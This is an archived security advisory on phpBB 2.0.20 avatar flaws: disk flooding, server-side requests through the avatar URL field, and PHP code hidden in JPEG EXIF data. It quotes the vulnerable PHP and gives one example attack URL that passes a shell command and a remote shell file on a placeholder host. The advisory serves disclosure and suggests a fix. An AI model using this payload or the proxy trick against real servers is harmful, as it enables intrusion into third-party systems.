Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web BBS :: Frequently Exploited :: b06-2171.htm

PHPBB 2.0.20 persistent issues with avatars



PHPBB 2.0.20 persistent issues with avatars
PHPBB 2.0.20 persistent issues with avatars



PHPBB 2.0.20 multiple issues with avatars=0D
=0D
some problems persistently lie in the way it handles remote and uploaded avatars:=0D
=0D
a remote user can:=0D
 =0D
(1) saturate the server with unuseful files, 'cause phpbb do not delete=0D
the previous one when you upload a new avatar=0D
=0D
(2) use PhpBB installations to launch exploits against other servers,=0D
using "avatarurl" argument when you modify your profile as path=0D
of a GET request.=0D
=0D
Look usercp_avatar.php near lines 125-153:=0D
...=0D
if ( $avatar_mode == 'remote' && preg_match('/^(http:\/\/)?([\w\-\.]+)\:?([0-9]*)\/(.*)$/', $avatar_filename, $url_ary) )=0D
	{=0D
		if ( empty($url_ary[4]) )=0D
		{=0D
			$error = true;=0D
			$error_msg = ( !empty($error_msg) ) ? $error_msg . '
' . $lang['Incomplete_URL'] : $lang['Incomplete_URL'];=0D return;=0D }=0D =0D $base_get = '/' . $url_ary[4];=0D $port = ( !empty($url_ary[3]) ) ? $url_ary[3] : 80;=0D =0D if ( !($fsock = @fsockopen($url_ary[2], $port, $errno, $errstr)) )=0D {=0D $error = true;=0D $error_msg = ( !empty($error_msg) ) ? $error_msg . '
' . $lang['No_connection_URL'] : $lang['No_connection_URL'];=0D return;=0D }=0D =0D @fputs($fsock, "GET $base_get HTTP/1.1\r\n");=0D @fputs($fsock, "HOST: " . $url_ary[2] . "\r\n");=0D @fputs($fsock, "Connection: close\r\n\r\n");=0D =0D unset($avatar_data);=0D while( !@feof($fsock) )=0D {=0D $avatar_data .= @fread($fsock, $board_config['avatar_filesize']);=0D }=0D @fclose($fsock);=0D ...=0D =0D phpbb do not check if the user supplied value ends with an image extension, neither=0D checks if the supplied string contains "&" and "?" chars. So, you can submit a value=0D like this:=0D =0D http://some_vulnerable.host/somescript.php?cmd=ls%20-la&xpl=http://somehost/someshell.txt=0D =0D phpbb will launch a GET request like this:=0D =0D GET /somescript.php?cmd=ls%20-la&xpl=http://somehost/someshell.txt HTTP/1.0=0D HOST: some_vulnerable.host=0D Connection: close=0D =0D obviously you have no output, but this makes phpbb to be like a http proxy=0D =0D (3) inject some php code inside jpeg files as EXIF metadata content:=0D this, in combinations with third party vulnerable code can be used=0D to compromise the server where PHP is installed. =0D Should be enough to check for php code inside the temporary files=0D before to copy the new avatar in "images/avatars/" folder.=0D =0D rgod=0D ---------------------------------------------------------------------------------=0D mail: rgod [at] autistici [dot] org=0D site: http://retrogod.altervista.org


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH